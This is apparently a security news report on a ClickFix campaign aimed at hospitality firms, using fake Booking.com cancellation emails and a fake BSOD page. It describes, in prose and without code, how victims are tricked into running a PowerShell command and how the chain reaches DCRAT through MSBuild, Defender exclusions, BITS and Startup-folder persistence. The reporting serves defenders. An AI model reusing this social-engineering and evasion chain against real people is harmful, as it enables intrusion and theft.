In this new ClickFix campaign, attackers send phishing emails that impersonate a hotel guest cancelling their Booking.com reservation, typically sent to a hospitality firm.
The claimed refund amount is significant enough to create a sense of urgency for the recipient of the email.
Clicking the link in the email takes the victim to a fake Booking.com website. "The page utilizes official Booking.com branding, including the correct color palette, logos, and font styles.
The site hosts malicious JavaScript that displays a fake "Loading is taking too long" error to the target, prompting them to click a button to refresh the page.
However, when the target clicks the button, the browser instead enters full-screen mode and displays a fake Windows BSOD crash screen that initiates the ClickFix social engineering attack.
The screen prompts the person to open the Windows Run dialog box and then press CTRL+V, which pastes a malicious command copied to the Windows clipboard.
The user is then prompted to press the OK button or Enter on their keyboard to execute the command.
Pasting the provided command runs a PowerShell command that opens a decoy Booking.com admin page. At the same time, in the background, it downloads a malicious .NET project (v.proj) and compiles it with the legitimate Windows MSBuild.exe compiler.
When executed, the payload adds Windows Defender exclusions and triggers UAC prompts to gain admin rights, before it downloads the primary loader using the Background Intelligent Transfer Service (BITS) and establishes persistence by dropping a .url file in the Startup folder.
The malware (staxs.exe) is DCRAT, a remote access Trojan commonly used by threat actors for remote access to infected devices.
